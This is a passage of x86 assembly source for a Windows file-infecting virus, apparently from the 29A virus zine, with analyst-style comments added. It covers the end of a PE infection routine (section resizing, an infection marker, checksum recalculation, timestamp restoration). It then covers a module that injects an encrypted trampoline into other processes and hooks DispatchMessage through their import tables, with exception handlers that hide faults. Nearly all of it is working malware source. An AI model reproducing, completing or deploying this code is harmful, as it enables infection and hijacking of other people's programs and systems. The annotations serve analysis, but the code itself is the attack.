29a-7.007
file_op_2:
mov dword ptr [ebp+blk_min_size-file_op_ip],INF_MIN_BLK_SIZE
pushad
sub edi,[edx+0ch]
add edi,[edx+4]
mov ebx,[edx] ;VirtualSize
mov edi,[edx+8] ;SizeOfRawData
xor esi,esi
cmp ebx,edi
jna short file_op_3
xchg edi,ebx
inc esi
file_op_3:
add ebx,ecx
add ebx,8
file_op_4:
cmp ebx,edi ;is bigger one less than small one?
jna short file_op_5 ;no
add edi,[eax+3ch] ;FileAlignment
jmp short file_op_4
file_op_5:
or esi,esi
jz short file_op_6
xchg edi,ebx
file_op_6:
mov [edx],ebx
mov [edx+8],edi
popad
rep movsb
or dword ptr [edx+1ch],00000040h or 40000000h; modify section's Characteristics
and dword ptr [edx+1ch],not 02020000 ;delete discardable Characteristics
goto_next_section:
mov ecx,vir_size
remaind_size equ $-4
jecxz file_op_ok
call is_final_section
jnz next_section
jmp first_section
file_op_ok:
xor edi,edi
SUBCALL get_section_of_rva,file_op_ip
;Round image size
mov ecx,[edx]
add ecx,[edx+4]
mov ebx,[eax+50h]
file_op_9:
cmp ecx,ebx
jbe short file_op_10
add ebx,[eax+38h]
jmp short file_op_9
file_op_10:
mov [eax+50h],ebx
;Round physical size
mov ecx,[edx+8]
add ecx,[edx+0ch]
cmp ecx,[esp+8]
jc short file_op_11
mov [esp+8],ecx
file_op_11:
pop esi ;esi=file base
push esi
mov byte ptr [esi+MEM_INF_POS],MEM_INF_SIGN ;Set memory infected sign.
;Recalculate checksum if there is any
lea ebx,[eax+58h]
mov ecx,[ebx] ;Is the checksum zero?
jecxz no_checksum ;Yes,it's zero,nothing to do;
;Now let me calculate the checksum
mov dword ptr [ebx],0 ;zero the checksum
mov ecx,[esp+8] ;the file size
push ecx ;the file size after infect
shr ecx,1
xor edx,edx
checksum_loop:
movzx eax, word ptr [esi]
add edx, eax
mov eax, edx
and edx, 0ffffh
shr eax, 10h
add edx, eax
inc esi
inc esi
loop checksum_loop
mov eax, edx
shr eax, 10h
add ax, dx
pop ecx
add eax,ecx
;Now eax is the checksum,store it
mov [ebx],eax
no_checksum:
file_op_unmapping:
mov esp,12345678h
file_op_esp equ $-4
;Now esp have point to file mapping base pointer
call [ebp+addrUnmapViewOfFile-file_op_ip]
file_op_fail_mapviewoffile:
call [ebp+addrCloseHandle-file_op_ip] ;Close file mapping
file_op_fail_createfilemapping:
pop eax ;eax=file size
push large 0
push large 0
push eax
push dword ptr [esp+4*3]
call [ebp+addrSetFilePointer-file_op_ip]
push dword ptr [esp]
call [ebp+addrSetEndOfFile-file_op_ip] ;truncate the file to fit size
file_op_fail_getfilesize:
pop eax
push eax
lea ebx,[ebp+ftime-file_op_ip]
push ebx ;ebx->file last write time
add ebx,8
push ebx
add ebx,8
push ebx
push eax
call [ebp+addrSetFileTime-file_op_ip]
call [ebp+addrCloseHandle-file_op_ip] ;Close file
file_op_fail_createfile:
call [ebp+addrSetFileAttributesA-file_op_ip]
xor ecx,ecx
POP DWord Ptr FS:[ecx] ; restore except chain
pop ecx
pop ecx
file_op_ret:
popad
retn
;-----------------------------------------------------------------------
; file_op_seh -- SEH handler covering the file-infection routine above.
; x86 SEH handler stack on entry: [esp]=ret, +4 ExceptionRecord,
; +8 EstablisherFrame, +0Ch ContextRecord.
; Any fault raised while the mapped file is being parsed/patched is
; absorbed: the faulting context's EIP is rewritten to file_op_unmapping,
; so execution resumes on the cleanup path (which first reloads esp from
; the patched file_op_esp slot) instead of the exception propagating.
; Analyst note: this is why a malformed target file does not crash the
; infector -- parse faults are silently converted into "unmap and close".
;-----------------------------------------------------------------------
file_op_seh:
call file_op_seh_ip ; push the runtime address of file_op_seh_ip
file_op_seh_ip:
pop eax ; eax = &file_op_seh_ip (delta base)
lea eax,[eax-(file_op_seh_ip-file_op_unmapping)] ; eax = runtime address of file_op_unmapping
PUSH eax
MOV EAX,[ESP + 00Ch+4] ; context (ContextRecord; +4 accounts for the PUSH above)
POP DWord Ptr [EAX + 0B8h] ; context.eip = @ExceptProc (0B8h = CONTEXT.Eip on x86)
XOR EAX,EAX ; 0 = ExceptionContinueExecution
RET
;-----------------------------------------------------------------------
; is_final_section -- is the current section the last one in the image?
; in--edx->current section header, at its VirtualSize field (callers on
;     this page read [edx]=VirtualSize, [edx+4]=VirtualAddress,
;     [edx+8]=SizeOfRawData), eax->PE base, ebx->base address,
;     ebp->file_op_ip
; out--ZF set: this is the final section; ZF cleared: it is not.
; All registers are preserved (pushad/popad); only the flags come back.
;-----------------------------------------------------------------------
is_final_section:
pushad
mov ecx,edx ; ecx = current section (edx is overwritten by the lookup)
xor edi,edi ; rva 0 -- the same argument file_op_ok passes before sizing
; the image from the returned section, so presumably get_section_of_rva
; (defined elsewhere) yields the last section for rva 0 -- TODO confirm
SUBCALL get_section_of_rva,file_op_ip ; edx -> section returned for rva 0
cmp ecx,edx ; ZF = (current section == that section)
popad ; popad does not touch EFLAGS, so the ZF above reaches the caller
retn
is_final_section_end:
file_operate_end:
;*******************************infect.asm end*****************************
;*******************************infproc.asm*****************************
;include infproc.asm
;Code to inject to process
;-----------------------------------------------------------------------
; inject_code -- position-independent trampoline that inf_proc writes into
; the target process and splices into one of that process's IAT entries.
; It runs inside the target, in place of the hooked API:
;   1. pushad/pushfd, OpenFileMappingA(FILE_MAP_WRITE, FALSE, FMAP_NAME),
;      MapViewOfFile(...) on the named mapping holding the body;
;   2. on success, rewrite its own leading jmp so every later call goes
;      straight to step 3 (one-shot), then call main_enter in the view;
;   3. popfd/popad and push/retn to the original API address, so the
;      hooked caller still gets the real API with its stack untouched.
; The three 12345678h dwords are placeholders that inf_proc fills in before
; the block is written out (inject_code_openfilemapping,
; inject_code_mapviewoffile, inject_code_raw_api).  The self-patch in
; step 2 needs a writable code page; inf_proc makes the destination
; PAGE_EXECUTE_READWRITE through virtual_protect.  Relocation is purely
; via the call/pop delta in ebp.
; Analyst note: an IAT slot pointing into the main module's own section
; slack, and a thunk that opens a named file mapping, are the artefacts
; this block leaves behind.
;-----------------------------------------------------------------------
CALLHEADER inject_code
inject_code:
jmp short $+2 ; 2-byte jmp with displacement 0 = fall through
inject_code_flow equ $-1 ; the displacement byte; rewritten below after the first success
pushad
pushfd
call inject_code_ip
inject_code_ip:
pop ebp ; ebp = runtime address of inject_code_ip (delta base)
xor esi,esi ; esi = 0, reused for the FALSE/0 arguments below
call inject_code_1 ; pushes the address of the inline name string
db FMAP_NAME
inject_code_1:
push esi ; bInheritHandle = FALSE
push large FILE_MAP_WRITE ; dwDesiredAccess
mov edx,12345678h ; placeholder -> OpenFileMappingA (patched by inf_proc)
inject_code_openfilemapping equ $-4
call edx ; OpenFileMappingA(FILE_MAP_WRITE, FALSE, FMAP_NAME)
or eax,eax
jz short inject_code_goto_raw ; no mapping present: just forward to the original API
push esi ; dwNumberOfBytesToMap = 0 (entire mapping)
push esi ; dwFileOffsetLow = 0
push esi ; dwFileOffsetHigh = 0
push large FILE_MAP_WRITE
push eax ; hFileMappingObject
mov edx,12345678 ; placeholder -> MapViewOfFile (patched by inf_proc; the literal is
inject_code_mapviewoffile equ $-4 ; decimal rather than hex, which is irrelevant since it is overwritten)
call edx
or eax,eax
jz short inject_code_goto_raw ; mapping failed: forward to the original API
mov byte ptr [ebp+inject_code_flow-inject_code_ip],inject_code_goto_raw_1-inject_code_flow-1 ; retarget the leading jmp to inject_code_goto_raw_1: from now on the hook is a pure pass-through
lea ebp,[eax+_start_ip-vir_header] ; ebp = delta base the mapped body expects (eax = view base) -- presumably what main_enter wants in ebp
add eax,main_enter-vir_header ; eax = main_enter inside the mapped view
call eax ; run the body out of the mapping
inject_code_goto_raw:
popfd
popad
inject_code_goto_raw_1:
push large 12345678h ; placeholder -> original IAT value (patched by inf_proc)
inject_code_raw_api equ $-4
retn ; tail-jump to the original API; the caller's arguments are still on the stack
inject_code_end:
inject_code_size equ $-inject_code
;-----------------------------------------------------------------------
; virtual_protect -- VirtualProtectEx(edi, ebx, INFPROC_PROT_SIZE,
;                    PAGE_EXECUTE_READWRITE, &old) on the target process.
; in--edi=process handle,ebx->process base address (callers also pass
;     other target addresses in ebx),ebp->inf_proc_ip
; out--ZF set: failed; ZF cleared: success.  All registers preserved.
; The previous protection is received in a stack slot and discarded, so
; the original protection is never restored by this code.
; Analyst note: a cross-process change to RWX followed by
; WriteProcessMemory is the API sequence this routine produces.
;-----------------------------------------------------------------------
CALLHEADER virtual_protect
virtual_protect:
pushad
push ecx ; stack slot that receives the old protection
push esp ; lpflOldProtect -> that slot
push large PAGE_EXECUTE_READWRITE ; flNewProtect
push large INFPROC_PROT_SIZE ; dwSize
push ebx ; lpAddress
push edi ; hProcess
call [ebp+addrVirtualProtectEx-inf_proc_ip]
pop ecx ; drop the old-protection slot
or eax,eax ; ZF = (return value == 0)
popad ; EFLAGS untouched, so ZF reaches the caller
retn
virtual_protect_end:
;-----------------------------------------------------------------------
; read_proc_mem -- ReadProcessMemory(edi, ebx, vbuffer, INFPROC_MAP_SIZE, &n)
; in--edi=process handle,ebx=process address to read,ebp->inf_proc_ip
; out--up to INFPROC_MAP_SIZE bytes copied into vbuffer; eax->vbuffer.
;      ZF set: the API returned 0 (it survives popad), but eax is the
;      buffer pointer, NOT the API result, and the callers on this page
;      do not test ZF after this call -- a failed/short read is used as
;      if it had succeeded.  Other registers preserved.
;-----------------------------------------------------------------------
CALLHEADER read_proc_mem
read_proc_mem:
lea eax,[ebp+vbuffer-inf_proc_ip] ; eax -> local buffer; loaded before pushad so popad hands it back
pushad
push ecx ; slot for lpNumberOfBytesRead
push esp
push large INFPROC_MAP_SIZE ; nSize
push eax ; lpBuffer = vbuffer
push ebx ; lpBaseAddress
push edi ; hProcess
call [ebp+addrReadProcessMemory-inf_proc_ip]
pop ecx ; discard the bytes-read count
or eax,eax ; ZF = (return value == 0)
popad ; restores eax = vbuffer; EFLAGS untouched
retn
read_proc_mem_end:
;-----------------------------------------------------------------------
; write_proc_mem -- WriteProcessMemory(edi, ebx, eax, ecx, &n)
; in--edi=process handle,ebx=process address to write,ebp->inf_proc_ip,eax->buffer,ecx=size to write
; out--ecx bytes written from the buffer at eax (inf_proc passes either
;      vbuffer or inject_code); ZF set: failed; ZF cleared: success.
;      All registers preserved.
;-----------------------------------------------------------------------
CALLHEADER write_proc_mem
write_proc_mem:
pushad
push ecx ; slot for lpNumberOfBytesWritten
push esp
push ecx ; nSize
push eax ; lpBuffer
push ebx ; lpBaseAddress
push edi ; hProcess
call [ebp+addrWriteProcessMemory-inf_proc_ip]
pop ecx ; discard the bytes-written count
or eax,eax ; ZF = (return value == 0)
popad ; EFLAGS untouched, so ZF reaches the caller
retn
write_proc_mem_end:
;-----------------------------------------------------------------------
; inf_proc -- hook one IAT entry of a running process with inject_code.
; in--edi=process handle,ebx->process base address
; out--nothing; all registers preserved (pushad/popad).
; Steps, each visible below:
;   1. install an SEH frame (inf_proc_seh) so any fault resumes at the
;      cleanup label inf_proc_seh_restore;
;   2. blk_decrypt the inject_code block in place and fill in its
;      OpenFileMappingA / MapViewOfFile placeholders;
;   3. make sure the named mapping FMAP_NAME exists; if not, create it
;      (create_mem_map) and copy the body from _start into it;
;   4. read the target's header page, test the MEM_INF_SIGN marker, set
;      it, and write the page back;
;   5. locate the section holding AddressOfEntryPoint; the injected code
;      is placed at base+VirtualAddress+min(VirtualSize,SizeOfRawData);
;   6. walk the import descriptors for "user"(32), read that IAT, stop on
;      DispatchMessageA/W or after a bounded scan, save the original
;      entry into inject_code_raw_api, point the entry at the injected
;      code, then write inject_code and the modified IAT into the target;
;   7. reload esp from the inf_proc_esp snapshot, re-encrypt the block
;      with a get_rand key, unlink the SEH frame, return.
; Analyst note: observable sequence is OpenFileMappingA on a fixed name,
; then VirtualProtectEx / ReadProcessMemory / WriteProcessMemory against
; another process, ending with an IAT slot that resolves into the main
; module's section slack instead of a DLL.
; Helpers defined elsewhere (blk_decrypt, blk_encrypt, create_mem_map,
; check_pe, get_section_of_rva, get_rand, eax_to_lowcase) are described
; only by how this routine uses them; verify against their definitions.
;-----------------------------------------------------------------------
CALLHEADER inf_proc
inf_proc:
pushad
call inf_proc_ip
inf_proc_ip:
pop ebp ; ebp = runtime address of inf_proc_ip (delta base)
push ebp ; stays on the stack until the final pop esi pair
lea esi,[ebp+inf_proc_seh-inf_proc_ip]
push esi ; handler address
xor esi,esi
push dword ptr fs:[esi] ; previous EXCEPTION_REGISTRATION
mov fs:[esi],esp ; fs:[0] -> new frame {prev, handler}
lea esi,[ebp+inject_code-inf_proc_ip]
push esi ; esi -> inject_code; popped again at inf_proc_seh_restore
call blk_decrypt ; decrypt the inject_code block in place (helper elsewhere; presumably keyed on esi)
pushad
mov ecx,[ebp+addrMapViewOfFile-inf_proc_ip]
mov [ebp+inject_code_mapviewoffile-inf_proc_ip],ecx ; fill inject_code's MapViewOfFile placeholder
mov ecx,[ebp+addrOpenFileMappingA-inf_proc_ip]
mov [ebp+inject_code_openfilemapping-inf_proc_ip],ecx ; fill its OpenFileMappingA placeholder
call inf_proc_0 ; pushes the address of the inline name
db FMAP_NAME
inf_proc_0:
pop edi ; edi -> FMAP_NAME
push edi ; lpName
push large 0 ; bInheritHandle = FALSE
push large FILE_MAP_WRITE ; dwDesiredAccess
call ecx ; OpenFileMappingA (ecx still holds its address)
or eax,eax
jz short inf_proc_not_mapped
push eax
call [ebp+addrCloseHandle-inf_proc_ip] ; mapping already exists: drop the handle
jmp short inf_proc_mapped
inf_proc_not_mapped:
mov eax,vir_mem_size
mov ecx,eax
SUBCALL create_mem_map,inf_proc_ip ; create the named mapping (helper elsewhere); from the branch below, ZF set = failed, else eax -> view
jz short inf_proc_mapped
cld
mov edi,eax ; edi -> view
xor eax,eax
stosd ; view[0] = 0
mov eax,vir_size
stosd ; view[4] = vir_size
lea esi,[ebp+_start-inf_proc_ip]
rep movsb ; copy the body from _start into the view (count = whatever ecx holds after create_mem_map -- TODO confirm)
mov [ebp+quick_sleep-inf_proc_ip],esi ;Have quick sleep (stores the post-copy esi, i.e. a non-zero value, into quick_sleep; presumably read as a flag elsewhere)
inf_proc_mapped:
popad
mov [ebp+inf_proc_esp-inf_proc_ip],esp ; esp snapshot for the cleanup path (stack now: inject_code ptr, SEH frame, ebp, pushad)
SUBCALL virtual_protect,inf_proc_ip ; make INFPROC_PROT_SIZE at the process base writable
jz inf_proc_ret
;edi ;Process handle
;ebx Process base address
;eax vbuffer address
push edi
push ebx
SUBCALL read_proc_mem,inf_proc_ip ; vbuffer = first INFPROC_MAP_SIZE bytes of the image; eax -> vbuffer
cmp byte ptr [eax+MEM_INF_POS],MEM_INF_SIGN ;Has been infected?
inf_proc_seh_restore_jmp:
jz inf_proc_seh_restore ; already marked: bail out (this jz is also reused as a jump target below)
mov byte ptr [eax+MEM_INF_POS],MEM_INF_SIGN ; mark the local copy
mov ecx,INFPROC_MAP_SIZE
SUBCALL write_proc_mem,inf_proc_ip ;Write import table (writes the whole header buffer, marker included, back to the base)
mov ebx,eax ; ebx -> vbuffer copy of the headers
SUBCALL check_pe,inf_proc_ip ; helper elsewhere; from the branch: ZF set = not a usable PE, else eax -> PE header in the buffer
jz short inf_proc_seh_restore_jmp
;eax->PE base
mov edi,[eax+28h] ; OptionalHeader.AddressOfEntryPoint
SUBCALL get_section_of_rva,inf_proc_ip ; section containing the entry point; edx -> its VirtualSize field
or ecx,ecx
jz short inf_proc_seh_restore_jmp ; ecx == 0: no section found (inferred from this use)
mov edi,[edx+4] ; section VirtualAddress
mov [ebp+inf_proc_rva-inf_proc_ip],edi ; patched into the address computation at inf_proc_2
mov edi,[edx] ; VirtualSize
mov ecx,[edx+8] ; SizeOfRawData
cmp edi,ecx
jna short inf_proc_3
xchg ecx,edi
inf_proc_3:
;Now edi is the small size,ecx is the big one
mov [ebp+inf_proc_code_size-inf_proc_ip],edi ; injected code goes right after the smaller size, i.e. into the section's slack
sub ecx,edx ; NOTE(review): subtracts the section-header pointer (edx) from a size, so the result is not the slack; the bound check below is not meaningful as written -- confirm
cmp ecx,inject_code_size
jc inf_proc_seh_restore
mov ecx,[eax+80h] ;Import directory (DataDirectory[1].VirtualAddress)
or ecx,ecx
jz short inf_proc_seh_restore_jmp ; no imports: abort
pop ebx ; ebx = process base
pop edi ; edi = process handle
push ebx ; [esp] = base; read back at inf_proc_102 and inf_proc_2
add ebx,ecx ; ebx = remote address of the import directory
push ecx ; import directory RVA
SUBCALL read_proc_mem,inf_proc_ip ; vbuffer = import descriptors; eax -> vbuffer
push edx
SUBCALL get_rand,inf_proc_ip ; helper elsewhere; dl is used as the random byte
movzx ecx,dl
and cl,3fh ; ecx = 0..63: default IAT scan count
pop edx
pop esi ; esi = import directory RVA
mov ebx,eax
sub ebx,5*4 ; ebx -> one descriptor before the first (20-byte IMAGE_IMPORT_DESCRIPTOR)
push ecx ; [esp] = scan count, [esp+4] = base
inf_proc_101:
add ebx,5*4 ; next descriptor
mov ecx,[ebx+3*4] ; descriptor.Name RVA
jecxz inf_proc_102 ; null descriptor = end of table
push eax
sub ecx,esi ; name offset relative to the import directory
cmp ecx,INFPROC_MAP_SIZE
jnc short inf_proc_102 ; name lies outside the buffer; NOTE(review): the push eax above is not popped on this exit, so the stack layout at inf_proc_102 differs on this path -- confirm intended
mov eax,[eax+ecx] ; first 4 bytes of the DLL name
call eax_to_lowcase ; helper elsewhere
cmp eax,'resu' ;user ("user" read as a little-endian dword, i.e. user32.dll)
pop eax
jnz short inf_proc_101
mov dword ptr [esp],1000h ; user32 found: widen the IAT scan count to 1000h entries
mov eax,ebx ; eax -> the user32 descriptor
inf_proc_102:
pop ecx ; ecx = scan count
mov ebx,[eax+4*4] ; descriptor.FirstThunk (IAT RVA); without user32 this is descriptor 0
add ebx,[esp] ; + base = remote IAT address
push ebx ; [esp] = remote IAT, [esp+4] = base
SUBCALL virtual_protect,inf_proc_ip ; make the IAT writable
jz inf_proc_seh_restore
SUBCALL read_proc_mem,inf_proc_ip ;read import table (the IAT thunks, into vbuffer)
mov esi,eax
cld
inf_proc_1:
lodsd ; eax = next IAT entry
cmp eax,[ebp+addrDispatchMessageA-inf_proc_ip] ;First find DispatchMessageA/W
jz short inf_proc_1_5
cmp eax,[ebp+addrDispatchMessageW-inf_proc_ip] ;First find DispatchMessageA/W
jz short inf_proc_1_5
or eax,eax
loopnz inf_proc_1 ; stop on the terminating 0 entry or when the scan count runs out
inf_proc_1_5:
sub esi,4 ; esi -> the entry just examined
or eax,eax
jnz short inf_proc_2
sub esi,4 ; hit the 0 terminator: back up to the last real entry
inf_proc_2:
mov eax,[esi] ; original API address in that slot
mov [ebp+inject_code_raw_api-inf_proc_ip],eax ; inject_code will forward to it
mov ebx,[esp+4] ; process base
add ebx,12345678h ; + section VirtualAddress (patched above)
inf_proc_rva equ $-4
add ebx,12345678h ; + min(VirtualSize,SizeOfRawData) (patched above)
inf_proc_code_size equ $-4
mov [esi],ebx ; local IAT copy now points at the injected code
SUBCALL virtual_protect,inf_proc_ip ; make the injection target writable/executable
jz short inf_proc_seh_restore
lea eax,[ebp+inject_code-inf_proc_ip]
push large inject_code_size
pop ecx ; ecx = inject_code_size
SUBCALL write_proc_mem,inf_proc_ip ;Write inject code
jz short inf_proc_seh_restore
pop ebx ; ebx = remote IAT address
lea eax,[ebp+vbuffer-inf_proc_ip]
mov ecx,INFPROC_MAP_SIZE
SUBCALL write_proc_mem,inf_proc_ip ;Write import table (modified IAT back into the target)
inf_proc_ret:
inf_proc_seh_restore:
mov esp,12345678h ; reload esp from the snapshot taken after inf_proc_mapped
inf_proc_esp equ $-4
SUBCALL get_rand,inf_proc_ip ; dx = fresh key (inferred from the store below)
pop esi ; esi -> inject_code
mov [esi-4],dx ; store the key word just before the block (inside the bytes CALLHEADER emits -- confirm)
call blk_encrypt ; re-encrypt the block in place
POP DWord Ptr FS:[0] ; restore except chain
pop esi ; discard the handler address
pop esi ; discard the saved ebp
popad
retn
inf_proc_seh:
call inf_proc_seh_ip
inf_proc_seh_ip:
pop eax ; eax = &inf_proc_seh_ip (delta base)
lea eax,[eax-(inf_proc_seh_ip-inf_proc_seh_restore)] ; eax = runtime address of inf_proc_seh_restore
PUSH eax
MOV EAX,[ESP + 00Ch+4] ; context (ContextRecord; +4 for the PUSH above)
POP DWord Ptr [EAX + 0B8h] ; context.eip = @ExceptProc (resume at the cleanup path; 0B8h = CONTEXT.Eip)
XOR EAX,EAX ; 0 = ExceptionContinueExecution
RET
inf_proc_end:
CALLHEADER enum_proc